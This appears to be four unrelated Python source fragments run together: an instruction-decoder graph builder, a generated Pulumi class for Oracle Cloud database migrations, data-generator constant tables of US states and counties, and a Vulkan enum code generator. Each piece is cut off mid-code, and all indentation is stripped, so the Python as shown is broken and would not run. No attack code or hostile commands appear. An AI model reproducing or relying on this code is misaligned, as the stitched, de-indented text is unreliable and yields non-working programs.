if bitpos >= len(ii.ipattern.bits):
done = True
else:
notdone = True
if done:
if notdone:
msge("Length error: some instructions done and some" +
" are not done simultaneously")
msge("ilist len = " + str(len(ilist)))
msge("\n\nILIST:")
for ii in ilist:
msge( 'bitpos:' + str(bitpos) +
' len-pattern:' + str( len(ii.ipattern.bits)))
if (len(ii.ipattern.bits)) == 0:
msge("BAD INST: %s" % ( str(ii)))
msge("\n\nNODE:")
print_node(ilist)
#die("Dying")
return -1 # problem: some done, some not done
return 1 # all is well, all done
return 0 # not done yet
def no_dont_cares(instructions, bitpos):
"Return True if there are no don't cares"
for i in instructions:
if i.ipattern.bits[bitpos].is_dont_care():
return False
return True
def some_different(instructions,bitpos):
"""Return True if there are ones and zeros and no don't cares,
nonterminals or operand deciders"""
zero = '0'
one= '1'
zeros = 0
ones = 0
for i in instructions:
if i.ipattern.bits[bitpos].value == zero:
zeros += 1
elif i.ipattern.bits[bitpos].value == one:
ones += 1
if zeros > 0 and ones > 0:
return True
return False
def scan_backwards_for_distinguishing_bit(instructions,bitpos):
"""Return a tuple (t/f, bitpos) that says where we can partition
this node further (when possible)."""
b = bitpos - 1
while b >= 0:
if no_dont_cares(instructions,b):
if some_different(instructions,b):
msge("FALLBACK: we can parition on the 1s and 0s at bitpos " +
str(b))
return (True, b)
b = b - 1
msge("FALLBACK: No bits left to examine: at bit %d" % (bitpos))
return (False, None)
def convert_splitpos_to_bit_index(graph,splitpos):
"""Convert the fake bitposition in splitpos in to a real bit
position by skipping leading operand deciders. Intervening
nonterminals might mess this up??? FIXME
"""
i = graph.instructions[0]
real_bits = 0
for b in i.ipattern.bits[0:splitpos]:
if not b.is_operand_decider():
real_bits += 1
msge("BACKSPLIT fake bitpos: %d real bitpos: %d\n" % (splitpos, real_bits))
return real_bits
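# Worked example (illustrative): if the first pattern's bits are
# [OD, '1', OD, '0', ...] and splitpos=3, only one non-operand-decider bit ('1')
# precedes the split, so the real bit index returned is 1.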
def back_split_graph(common, graph, bitpos, skipped_bits, splitpos):
"""Partition based on splitpos and then recur in to build_sub_graph
for the partitions."""
options = common.options
msge("back_split_graph: based on " + str(splitpos))
(ones,zeros,others) = partition_nodes(graph.instructions,splitpos)
if vbuild():
s = "ones %d zeros %d others %d" % (len(ones), len(zeros), len(others))
msge('back_split_graph: ' + s )
if len(others) > 0:
die("We encountered some junk on a back-split")
if len(zeros) == 0:
die("We didn't have any zeros in the back-split partition")
if len(ones) == 0:
die("We didn't have any ones in the back-split partition")
graph.skipped_bits = skipped_bits
graph.decider_bits = 1
graph.back_split_pos = convert_splitpos_to_bit_index(graph,splitpos)
# zero child node
znode = new_node(graph,'0',bitpos)
znode.instructions.extend(zeros)
build_sub_graph(common,znode,bitpos, 0) # RECUR
# one child node
onode = new_node(graph,'1',bitpos)
onode.instructions.extend(ones)
build_sub_graph(common,onode,bitpos, 0) # RECUR
# global hack -- FIXME: 2007-07-10 to get the operand storage
# dictionary into
# partition_by_required_values.
g_operand_storage_dict = None
def build_sub_graph(common, graph, bitpos, skipped_bits):
"""Recursively partition instructions based on 1s, 0s and
placeholder letters"""
global g_operand_storage_dict
options = common.options
# expand_dont_cares is an important control for the graph
# building. If expand_dont_cares is false, whenever we see a
    # don't-care in something at the next bit position, then we skip
# that bit in the graph formation. This leads to problems when
# skipped 1s and 0s are required | |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['MigrationArgs', 'Migration']
@pulumi.input_type
class MigrationArgs:
def __init__(__self__, *,
compartment_id: pulumi.Input[str],
source_database_connection_id: pulumi.Input[str],
target_database_connection_id: pulumi.Input[str],
type: pulumi.Input[str],
agent_id: Optional[pulumi.Input[str]] = None,
data_transfer_medium_details: Optional[pulumi.Input['MigrationDataTransferMediumDetailsArgs']] = None,
datapump_settings: Optional[pulumi.Input['MigrationDatapumpSettingsArgs']] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
display_name: Optional[pulumi.Input[str]] = None,
exclude_objects: Optional[pulumi.Input[Sequence[pulumi.Input['MigrationExcludeObjectArgs']]]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
golden_gate_details: Optional[pulumi.Input['MigrationGoldenGateDetailsArgs']] = None,
source_container_database_connection_id: Optional[pulumi.Input[str]] = None,
vault_details: Optional[pulumi.Input['MigrationVaultDetailsArgs']] = None):
"""
The set of arguments for constructing a Migration resource.
:param pulumi.Input[str] compartment_id: (Updatable) OCID of the compartment where the secret containing the credentials will be created.
:param pulumi.Input[str] source_database_connection_id: (Updatable) The OCID of the Source Database Connection.
:param pulumi.Input[str] target_database_connection_id: (Updatable) The OCID of the Target Database Connection.
:param pulumi.Input[str] type: (Updatable) Migration type.
:param pulumi.Input[str] agent_id: (Updatable) The OCID of the registered ODMS Agent. Required for OFFLINE Migrations.
:param pulumi.Input['MigrationDataTransferMediumDetailsArgs'] data_transfer_medium_details: (Updatable) Data Transfer Medium details for the Migration. If not specified, it will default to Database Link. Only one type of medium details can be specified.
:param pulumi.Input['MigrationDatapumpSettingsArgs'] datapump_settings: (Updatable) Optional settings for Datapump Export and Import jobs
:param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. Example: `{"foo-namespace.bar-key": "value"}`
:param pulumi.Input[str] display_name: (Updatable) Migration Display Name
:param pulumi.Input[Sequence[pulumi.Input['MigrationExcludeObjectArgs']]] exclude_objects: (Updatable) Database objects to exclude from migration.
:param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only. Example: `{"bar-key": "value"}`
:param pulumi.Input['MigrationGoldenGateDetailsArgs'] golden_gate_details: (Updatable) Details about Oracle GoldenGate Microservices. Required for online logical migration.
:param pulumi.Input[str] source_container_database_connection_id: (Updatable) The OCID of the Source Container Database Connection. Only used for ONLINE migrations. Only Connections of type Non-Autonomous can be used as source container databases.
:param pulumi.Input['MigrationVaultDetailsArgs'] vault_details: (Updatable) Oracle Cloud Infrastructure Vault details to store migration and connection credentials secrets
"""
pulumi.set(__self__, "compartment_id", compartment_id)
pulumi.set(__self__, "source_database_connection_id", source_database_connection_id)
pulumi.set(__self__, "target_database_connection_id", target_database_connection_id)
pulumi.set(__self__, "type", type)
if agent_id is not None:
pulumi.set(__self__, "agent_id", agent_id)
if data_transfer_medium_details is not None:
pulumi.set(__self__, "data_transfer_medium_details", data_transfer_medium_details)
if datapump_settings is not None:
pulumi.set(__self__, "datapump_settings", datapump_settings)
if defined_tags is not None:
pulumi.set(__self__, "defined_tags", defined_tags)
if display_name is not None:
pulumi.set(__self__, "display_name", display_name)
if exclude_objects is not None:
pulumi.set(__self__, "exclude_objects", exclude_objects)
if freeform_tags is not None:
pulumi.set(__self__, "freeform_tags", freeform_tags)
if golden_gate_details is not None:
pulumi.set(__self__, "golden_gate_details", golden_gate_details)
if source_container_database_connection_id is not None:
pulumi.set(__self__, "source_container_database_connection_id", source_container_database_connection_id)
if vault_details is not None:
pulumi.set(__self__, "vault_details", vault_details)
@property
@pulumi.getter(name="compartmentId")
def compartment_id(self) -> pulumi.Input[str]:
"""
(Updatable) OCID of the compartment where the secret containing the credentials will be created.
"""
return pulumi.get(self, "compartment_id")
@compartment_id.setter
def compartment_id(self, value: pulumi.Input[str]):
pulumi.set(self, "compartment_id", value)
@property
@pulumi.getter(name="sourceDatabaseConnectionId")
def source_database_connection_id(self) -> pulumi.Input[str]:
"""
(Updatable) The OCID of the Source Database Connection.
"""
return pulumi.get(self, "source_database_connection_id")
@source_database_connection_id.setter
def source_database_connection_id(self, value: pulumi.Input[str]):
pulumi.set(self, "source_database_connection_id", value)
@property
@pulumi.getter(name="targetDatabaseConnectionId")
def target_database_connection_id(self) -> pulumi.Input[str]:
"""
(Updatable) The OCID of the Target Database Connection.
"""
return pulumi.get(self, "target_database_connection_id")
@target_database_connection_id.setter
def target_database_connection_id(self, value: pulumi.Input[str]):
pulumi.set(self, "target_database_connection_id", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
(Updatable) Migration type.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="agentId")
def agent_id(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The OCID of the registered ODMS Agent. Required for OFFLINE Migrations.
"""
return pulumi.get(self, "agent_id")
@agent_id.setter
def agent_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "agent_id", value)
@property
@pulumi.getter(name="dataTransferMediumDetails")
def data_transfer_medium_details(self) -> Optional[pulumi.Input['MigrationDataTransferMediumDetailsArgs']]:
"""
(Updatable) Data Transfer Medium details for the Migration. If not specified, it will default to Database Link. Only one type of medium details can be specified.
"""
return pulumi.get(self, "data_transfer_medium_details")
@data_transfer_medium_details.setter
def data_transfer_medium_details(self, value: Optional[pulumi.Input['MigrationDataTransferMediumDetailsArgs']]):
pulumi.set(self, "data_transfer_medium_details", value)
@property
@pulumi.getter(name="datapumpSettings")
def datapump_settings(self) -> Optional[pulumi.Input['MigrationDatapumpSettingsArgs']]:
"""
(Updatable) Optional settings for Datapump Export and Import jobs
"""
return pulumi.get(self, "datapump_settings")
@datapump_settings.setter
def datapump_settings(self, value: Optional[pulumi.Input['MigrationDatapumpSettingsArgs']]):
pulumi.set(self, "datapump_settings", value)
@property
@pulumi.getter(name="definedTags")
def defined_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
(Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. Example: `{"foo-namespace.bar-key": "value"}`
"""
return pulumi.get(self, "defined_tags")
@defined_tags.setter
def defined_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "defined_tags", value)
@property
@pulumi.getter(name="displayName")
def display_name(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) Migration Display Name
"""
return pulumi.get(self, "display_name")
@display_name.setter
def display_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "display_name", value)
@property
@pulumi.getter(name="excludeObjects")
def exclude_objects(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MigrationExcludeObjectArgs']]]]:
"""
(Updatable) Database objects to exclude from migration.
"""
return pulumi.get(self, "exclude_objects")
@exclude_objects.setter
def exclude_objects(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MigrationExcludeObjectArgs']]]]):
pulumi.set(self, "exclude_objects", value)
@property
@pulumi.getter(name="freeformTags")
def freeform_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
(Updatable) Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only. Example: `{"bar-key": "value"}`
"""
return pulumi.get(self, "freeform_tags")
@freeform_tags.setter
def freeform_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "freeform_tags", value)
@property
@pulumi.getter(name="goldenGateDetails")
def golden_gate_details(self) -> Optional[pulumi.Input['MigrationGoldenGateDetailsArgs']]:
"""
(Updatable) Details about Oracle GoldenGate Microservices. Required for online logical migration.
"""
return pulumi.get(self, "golden_gate_details")
@golden_gate_details.setter
def golden_gate_details(self, value: Optional[pulumi.Input['MigrationGoldenGateDetailsArgs']]):
pulumi.set(self, "golden_gate_details", value)
@property
@pulumi.getter(name="sourceContainerDatabaseConnectionId")
def source_container_database_connection_id(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The OCID of the Source Container Database Connection. Only used for ONLINE migrations. Only Connections of type Non-Autonomous can be used as source container databases.
"""
return pulumi.get(self, "source_container_database_connection_id")
@source_container_database_connection_id.setter
def source_container_database_connection_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "source_container_database_connection_id", value)
@property
@pulumi.getter(name="vaultDetails")
def vault_details(self) -> Optional[pulumi.Input['MigrationVaultDetailsArgs']]:
"""
(Updatable) Oracle Cloud Infrastructure Vault details to store migration and connection credentials secrets
"""
return pulumi.get(self, "vault_details")
@vault_details.setter
def vault_details(self, value: Optional[pulumi.Input['MigrationVaultDetailsArgs']]):
pulumi.set(self, "vault_details", value)
@pulumi.input_type
class _MigrationState:
def __init__(__self__, *,
agent_id: Optional[pulumi.Input[str]] = None,
compartment_id: Optional[pulumi.Input[str]] = None,
credentials_secret_id: Optional[pulumi.Input[str]] = None,
data_transfer_medium_details: Optional[pulumi.Input['MigrationDataTransferMediumDetailsArgs']] = None,
datapump_settings: Optional[pulumi.Input['MigrationDatapumpSettingsArgs']] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
display_name: Optional[pulumi.Input[str]] = None,
exclude_objects: Optional[pulumi.Input[Sequence[pulumi.Input['MigrationExcludeObjectArgs']]]] = None,
executing_job_id: Optional[pulumi.Input[str]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
golden_gate_details: Optional[pulumi.Input['MigrationGoldenGateDetailsArgs']] = None,
lifecycle_details: Optional[pulumi.Input[str]] = None,
source_container_database_connection_id: Optional[pulumi.Input[str]] = None,
source_database_connection_id: Optional[pulumi.Input[str]] = None,
state: Optional[pulumi.Input[str]] = None,
system_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
target_database_connection_id: Optional[pulumi.Input[str]] = None,
time_created: Optional[pulumi.Input[str]] = None,
time_last_migration: Optional[pulumi.Input[str]] = None,
time_updated: Optional[pulumi.Input[str]] = None,
type: Optional[pulumi.Input[str]] = None,
vault_details: Optional[pulumi.Input['MigrationVaultDetailsArgs']] = None,
wait_after: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering Migration resources.
:param pulumi.Input[str] agent_id: (Updatable) The OCID of the registered ODMS Agent. Required for OFFLINE Migrations.
:param pulumi.Input[str] compartment_id: (Updatable) OCID of the compartment where the secret containing the credentials will be created.
:param pulumi.Input[str] credentials_secret_id: OCID of the Secret in the Oracle Cloud Infrastructure vault containing the Migration credentials. Used to store Golden Gate admin user credentials.
:param pulumi.Input['MigrationDataTransferMediumDetailsArgs'] data_transfer_medium_details: (Updatable) Data Transfer Medium details for the Migration. If not specified, it will default to Database Link. Only one type of medium details can be specified.
:param pulumi.Input['MigrationDatapumpSettingsArgs'] datapump_settings: (Updatable) Optional settings for Datapump Export and Import jobs
:param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. Example: `{"foo-namespace.bar-key": "value"}`
:param pulumi.Input[str] display_name: (Updatable) Migration Display Name
:param pulumi.Input[Sequence[pulumi.Input['MigrationExcludeObjectArgs']]] exclude_objects: (Updatable) Database objects to exclude from migration.
:param pulumi.Input[str] executing_job_id: OCID of the current ODMS Job in execution for the Migration, if any.
:param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only. Example: `{"bar-key": "value"}`
:param pulumi.Input['MigrationGoldenGateDetailsArgs'] golden_gate_details: (Updatable) Details about Oracle GoldenGate Microservices. Required for online logical migration.
:param pulumi.Input[str] lifecycle_details: Additional status related to the execution and current state of the Migration.
:param pulumi.Input[str] source_container_database_connection_id: (Updatable) The OCID of the Source Container Database Connection. Only used for ONLINE migrations. Only Connections of type Non-Autonomous can be used as source container databases.
:param pulumi.Input[str] source_database_connection_id: (Updatable) The OCID of the Source Database Connection.
:param pulumi.Input[str] state: The current state of the Migration Resource.
:param pulumi.Input[Mapping[str, Any]] system_tags: Usage of system tag keys. These predefined keys are scoped to namespaces. Example: `{"orcl-cloud.free-tier-retained": "true"}`
:param pulumi.Input[str] target_database_connection_id: (Updatable) The OCID of the | |
STATES = (
('AK', 'Alaska'),
('AL', 'Alabama'),
('AR', 'Arkansas'),
('AZ', 'Arizona'),
('CA', 'California'),
('CO', 'Colorado'),
('CT', 'Connecticut'),
('DC', 'District of Columbia'),
('DE', 'Delaware'),
('FL', 'Florida'),
('GA', 'Georgia'),
('HI', 'Hawaii'),
('IA', 'Iowa'),
('ID', 'Idaho'),
('IL', 'Illinois'),
('IN', 'Indiana'),
('KS', 'Kansas'),
('KY', 'Kentucky'),
('LA', 'Louisiana'),
('MA', 'Massachusetts'),
('MD', 'Maryland'),
('ME', 'Maine'),
('MI', 'Michigan'),
('MN', 'Minnesota'),
('MO', 'Missouri'),
('MS', 'Mississippi'),
('MT', 'Montana'),
('NC', 'North Carolina'),
('ND', 'North Dakota'),
('NE', 'Nebraska'),
('NH', 'New Hampshire'),
('NJ', 'New Jersey'),
('NM', 'New Mexico'),
('NV', 'Nevada'),
('NY', 'New York'),
('OH', 'Ohio'),
('OK', 'Oklahoma'),
('OR', 'Oregon'),
('PA', 'Pennsylvania'),
('RI', 'Rhode Island'),
('SC', 'South Carolina'),
('SD', 'South Dakota'),
('TN', 'Tennessee'),
('TX', 'Texas'),
('UT', 'Utah'),
('VA', 'Virginia'),
('VI', 'Virgin Islands'),
('VT', 'Vermont'),
('WA', 'Washington'),
('WI', 'Wisconsin'),
('WV', 'West Virginia'),
('WY', 'Wyoming'),
)
NUM_STATES = len(STATES)
STREET_SUFFIX = (
'Alley',
'Annex',
'Arcade',
'Avenue',
'Bend',
'Bay',
'Brae',
'Boulevard',
'Bypass',
'Circle',
'Close',
'Concession',
'Court',
'Cove',
'Crescent',
'Drive',
'Drung',
'Esplanade',
'Expressway',
'Extension',
'Ferry',
'Field',
'Freeway',
'Garden',
'Gardens',
'Gate',
'Glen',
'Green',
'Grove',
'Heights',
'High',
'Highway',
'Hill',
'Lane',
'Line',
'Loop',
'Mall',
'Manor',
'Mews',
'Nene',
'Parade',
'Park',
'Parkway',
'Path',
'Pike',
'Place',
'Plantation',
'Plaza',
'Point',
'Private',
'Promenade',
'Road',
'Side',
'Sideline',
'Route',
'Row',
'Run',
'Spur',
'Square',
'Stravenue',
'Street',
'Terrace',
'Thruway',
'Trace',
'Trail',
'Turnpike',
'Townline',
'Viaduct',
'Walk',
'Way',
'Wood',
'Wynd',
)
NUM_STREET_SUFFIXES = len(STREET_SUFFIX)
YEARS = 1998, 1999, 2000, 2001, 2002
GENDERS = 'M', 'F'
MARITAL_STATUSES = 'D', 'M', 'S', 'U', 'W'
EDUCATION_STATUSES = (
'2 yr Degree',
'4 yr Degree',
'Advanced Degree',
'College',
'Primary',
'Secondary',
'Unknown',
)
CATEGORIES = (
'Books',
'Children',
'Electronics',
'Home',
'Jewelry',
'Men',
'Music',
'Shoes',
'Sports',
'Women',
)
COUNTIES = (
'Abbeville County',
'Acadia Parish',
'Accomack County',
'Ada County',
'Adair County',
'Adams County',
'Addison County',
'Aiken County',
'Aitkin County',
'Alachua County',
'Alamance County',
'Alameda County',
'Alamosa County',
'Albany County',
'Albemarle County',
'Alcona County',
'Alcorn County',
'Aleutians East Borough',
'Aleutians West Census Area',
'Alexander County',
'Alexandria city',
'Alfalfa County',
'Alger County',
'Allamakee County',
'Allegan County',
'Allegany County',
'Alleghany County',
'Allegheny County',
'Allen County',
'Allendale County',
'Allen Parish',
'Alpena County',
'Alpine County',
'Amador County',
'Amelia County',
'Amherst County',
'Amite County',
'Anchorage Borough',
'Anderson County',
'Andrew County',
'Andrews County',
'Androscoggin County',
'Angelina County',
'Anne Arundel County',
'Anoka County',
'Anson County',
'Antelope County',
'Antrim County',
'Apache County',
'Appanoose County',
'Appling County',
'Appomattox County',
'Aransas County',
'Arapahoe County',
'Archer County',
'Archuleta County',
'Arenac County',
'Arkansas County',
'Arlington County',
'Armstrong County',
'Aroostook County',
'Arthur County',
'Ascension Parish',
'Ashe County',
'Ashland County',
'Ashley County',
'Ashtabula County',
'Asotin County',
'Assumption Parish',
'Atascosa County',
'Atchison County',
'Athens County',
'Atkinson County',
'Atlantic County',
'Atoka County',
'Attala County',
'Audrain County',
'Audubon County',
'Auglaize County',
'Augusta County',
'Aurora County',
'Austin County',
'Autauga County',
'Avery County',
'Avoyelles Parish',
'Baca County',
'Bacon County',
'Bailey County',
'Baker County',
'Baldwin County',
'Ballard County',
'Baltimore city',
'Baltimore County',
'Bamberg County',
'Bandera County',
'Banks County',
'Banner County',
'Bannock County',
'Baraga County',
'Barber County',
'Barbour County',
'Barnes County',
'Barnstable County',
'Barnwell County',
'Barren County',
'Barron County',
'Barrow County',
'Barry County',
'Bartholomew County',
'Barton County',
'Bartow County',
'Bastrop County',
'Bates County',
'Bath County',
'Baxter County',
'Bay County',
'Bayfield County',
'Baylor County',
'Beadle County',
'Bear Lake County',
'Beaufort County',
'Beauregard Parish',
'Beaver County',
'Beaverhead County',
'Becker County',
'Beckham County',
'Bedford city',
'Bedford County',
'Bee County',
'Belknap County',
'Bell County',
'Belmont County',
'Beltrami County',
'Benewah County',
'Ben Hill County',
'Bennett County',
'Bennington County',
'Benson County',
'Bent County',
'Benton County',
'Benzie County',
'Bergen County',
'Berkeley County',
'Berks County',
'Berkshire County',
'Bernalillo County',
'Berrien County',
'Bertie County',
'Bethel Census Area',
'Bexar County',
'Bibb County',
'Bienville Parish',
'Big Horn County',
'Big Stone County',
'Billings County',
'Bingham County',
'Blackford County',
'Black Hawk County',
'Bladen County',
'Blaine County',
'Blair County',
'Blanco County',
'Bland County',
'Bleckley County',
'Bledsoe County',
'Blount County',
'Blue Earth County',
'Boise County',
'Bolivar County',
'Bollinger County',
'Bond County',
'Bon Homme County',
'Bonner County',
'Bonneville County',
'Boone County',
'Borden County',
'Bosque County',
'Bossier Parish',
'Botetourt County',
'Bottineau County',
'Boulder County',
'Boundary County',
'Bourbon County',
'Bowie County',
'Bowman County',
'Box Butte County',
'Box Elder County',
'Boyd County',
'Boyle County',
'Bracken County',
'Bradford County',
'Bradley County',
'Branch County',
'Brantley County',
'Braxton County',
'Brazoria County',
'Brazos County',
'Breathitt County',
'Breckinridge County',
'Bremer County',
'Brevard County',
'Brewster County',
'Briscoe County',
'Bristol Bay Borough',
'Bristol city',
'Bristol County',
'Broadwater County',
'Bronx County',
'Brooke County',
'Brookings County',
'Brooks County',
'Broome County',
'Broward County',
'Brown County',
'Brule County',
'Brunswick County',
'Bryan County',
'Buchanan County',
'Buckingham County',
'Bucks County',
'Buena Vista city',
'Buena Vista County',
'Buffalo County',
'Bullitt County',
'Bulloch County',
'Bullock County',
'Buncombe County',
'Bureau County',
'Burke County',
'Burleigh County',
'Burleson County',
'Burlington County',
'Burnet County',
'Burnett County',
'Burt County',
'Butler County',
'Butte County',
'Butts County',
'Cabarrus County',
'Cabell County',
'Cache County',
'Caddo County',
'Caddo Parish',
'Calaveras County',
'Calcasieu Parish',
'Caldwell County',
'Caldwell Parish',
'Caledonia County',
'Calhoun County',
'Callahan County',
'Callaway County',
'Calloway County',
'Calumet County',
'Calvert County',
'Camas County',
'Cambria County',
'Camden County',
'Cameron County',
'Cameron Parish',
'Campbell County',
'Camp County',
'Canadian County',
'Candler County',
'Cannon County',
'Canyon County',
'Cape Girardeau County',
'Cape May County',
'Carbon County',
'Caribou County',
'Carlisle County',
'Carlton County',
'Caroline County',
'Carroll County',
'Carson City',
'Carson County',
'Carter County',
'Carteret County',
'Carver County',
'Cascade County',
'Casey County',
'Cass County',
'Cassia County',
'Castro County',
'Caswell County',
'Catahoula Parish',
'Catawba County',
'Catoosa County',
'Catron County',
'Cattaraugus County',
'Cavalier County',
'Cayuga County',
'Cecil County',
'Cedar County',
'Centre County',
'Cerro Gordo County',
'Chaffee County',
'Chambers County',
'Champaign County',
'Chariton County',
'Charle',
'Charles City County',
'Charles County',
'Charles Mix County',
'Charleston County',
'Charlevoix County',
'Charlotte County',
'Charlottesville city',
'Charlton County',
'Chase County',
'Chatham County',
'Chattahoochee County',
'Chattooga County',
'Chautauqua County',
'Chaves County',
'Cheatham County',
'Cheboygan County',
'Chelan County',
'Chemung County',
'Chenango County',
'Cherokee County',
'Cherry County',
'Chesapeake city',
'Cheshire County',
'Chester County',
'Chesterfield County',
'Cheyenne County',
'Chickasaw County',
'Chicot County',
'Childress County',
'Chilton County',
'Chippewa County',
'Chisago County',
'Chittenden County',
'Choctaw County',
'Chouteau County',
'Chowan County',
'Christian County',
'Churchill County',
'Cibola County',
'Cimarron County',
'Citrus County',
'Clackamas County',
'Claiborne County',
'Claiborne Parish',
'Clallam County',
'Clare County',
'Clarendon County',
'Clarion County',
'Clark County',
'Clarke County',
'Clatsop County',
'Clay County',
'Clayton County',
'Clear Creek County',
'Clearfield County',
'Clearwater County',
'Cleburne County',
'Clermont County',
'Cleveland County',
'Clifton Forge city',
'Clinch County',
'Clinton County',
'Cloud County',
'Coahoma County',
'Coal County',
'Cobb County',
'Cochise County',
'Cochran County',
'Cocke County',
'Coconino County',
'Codington County',
'Coffee County',
'Coffey County',
'Coke County',
'Colbert County',
'Cole County',
'Coleman County',
'Coles County',
'Colfax County',
'Colleton County',
'Collier County',
'Collin County',
'Collingsworth County',
'Colonial Heights city',
'Colorado County',
'Colquitt County',
'Columbia County',
'Columbiana County',
'Columbus County',
'Colusa County',
'Comal County',
'Comanche County',
'Concho County',
'Concordia Parish',
'Conecuh County',
'Conejos County',
'Contra Costa County',
'Converse County',
'Conway County',
'Cook County',
'Cooke County',
'Cooper County',
'Coosa County',
'Coos County',
'Copiah County',
'Corson County',
'Cortland County',
'Coryell County',
'Coshocton County',
'Costilla County',
'Cottle County',
'Cotton County',
'Cottonwood County',
'Covington city',
'Covington County',
'Coweta County',
'Cowley County',
'Cowlitz County',
'Craig County',
'Craighead County',
'Crane County',
'Craven County',
'Crawford County',
'Creek County',
'Crenshaw County',
'Crisp County',
'Crittenden County',
'Crockett County',
'Crook County',
'Crosby County',
'Cross County',
'Crowley County',
'Crow Wing County',
'Culberson County',
'Cullman County',
'Culpeper County',
'Cumberland County',
'Cuming County',
'Currituck County',
'Curry County',
'Custer County',
'Cuyahoga County',
'Dade County',
'Daggett County',
'Dakota County',
'Dale County',
'Dallam County',
'Dallas County',
'Dane County',
'Daniels County',
'Danville city',
'Dare County',
'Darke County',
'Darlington County',
'Dauphin County',
'Davidson County',
'Davie County',
'Daviess County',
'Davis County',
'Davison County',
'Dawes County',
'Dawson County',
'Day County',
'Deaf Smith County',
'Dearborn County',
'DeBaca County',
'Decatur County',
'Deer Lodge County',
'Defiance County',
'De Kalb County',
'DeKalb County',
'Delaware County',
'Del Norte County',
'Delta County',
'Denali Borough',
'Dent County',
'Denton County',
'Denver County',
'Deschutes County',
'Desha County',
'Des Moines County',
'DeSoto County',
'De Soto Parish',
'Deuel County',
'Dewey County',
'De Witt County',
'DeWitt County',
'Dickens County',
'Dickenson County',
'Dickey County',
'Dickinson County',
'Dickson County',
'Dillingham Census Area',
'Dillon County',
'Dimmit County',
'Dinwiddie County',
'District of Columbia',
'Divide County',
'Dixie County',
'Dixon County',
'Doddridge County',
'Dodge County',
| |
#!/usr/bin/env python3
import sys
import getopt
import xml.etree.ElementTree as ET
def processVendors(outFile, vendors):
outFile.writelines(["\nconstexpr std::array<std::string_view, ", str(
len(vendors)), "> vendors = {{\n"])
for vendor in vendors:
outFile.writelines([' \"', vendor.tag, '\",\n'])
outFile.write('}};\n')
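# Illustrative sample of the C++ emitted by processVendors (vendor tags are
# examples only, not taken from a real vk.xml):
#
#     constexpr std::array<std::string_view, 2> vendors = {{
#      "KHR",
#      "EXT",
#     }};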
def processEnumValue(outFile, enum, value):
if not value.get('value') is None:
# Spitting out plain values
outFile.write(value.get('value'))
elif not value.get('bitpos') is None:
# Bitflag
outFile.writelines(
['0x', format(1 << int(value.get('bitpos')), '08X')])
elif not value.get('alias') is None:
processEnumValue(outFile, enum, enum.find(value.get('alias')))
def processEnums(outFile, enums, vendors, first, last):
for enum in enums:
# Skip VkResult
if enum.tag == 'VkResult':
continue
        # Skip if there are no values; MSVC can't do zero-sized arrays
if len(enum.findall('./')) == 0:
continue
outFile.writelines(
['\nconstexpr EnumValueSet ', enum.tag, 'Sets[] = {\n'])
# Determine how much to chop off the front
strName = enum.tag
typeDigit = ''
# Determine if type ends with vendor tag
vendorName = ''
for vendor in vendors:
if strName.endswith(vendor.tag):
vendorName = vendor.tag
strName = strName[:-len(vendorName)]
if strName[-1].isdigit():
typeDigit = strName[-1]
strName = strName[:-1]
if strName.endswith('FlagBits'):
strName = strName[:-8]
# Construct most likely enum prefix
mainPrefix = ''
for char in strName:
if mainPrefix == '':
mainPrefix += char
elif char.isupper():
mainPrefix += '_'
mainPrefix += char.upper()
else:
mainPrefix += char.upper()
mainPrefix += '_'
if typeDigit != '':
mainPrefix += typeDigit
mainPrefix += '_'
current = first
while current <= last:
for value in enum.findall('./'):
if int(value.get('first')) != current:
continue
outFile.write(" {\"")
valueStr = value.tag
if valueStr.startswith(mainPrefix):
valueStr = valueStr[len(mainPrefix):]
if vendorName != '' and valueStr.endswith(vendorName):
valueStr = valueStr[:-len(vendorName)-1]
if valueStr.endswith('_BIT'):
valueStr = valueStr[:-4]
outFile.write(valueStr)
outFile.write("\", ")
processEnumValue(outFile, enum, value)
outFile.write("},\n")
current += 1
outFile.write('};\n')
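# Illustrative sample of the C++ emitted by processEnums, assuming the processed
# XML contains VkSampleCountFlagBits with VK_SAMPLE_COUNT_1_BIT at bitpos 0 (the
# VK_SAMPLE_COUNT_ prefix and _BIT suffix are stripped as coded above):
#
#     constexpr EnumValueSet VkSampleCountFlagBitsSets[] = {
#         {"1", 0x00000001},
#     };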
def main(argv):
inputFile = ''
outputFile = ''
try:
opts, args = getopt.getopt(argv, 'i:o:', [])
except getopt.GetoptError:
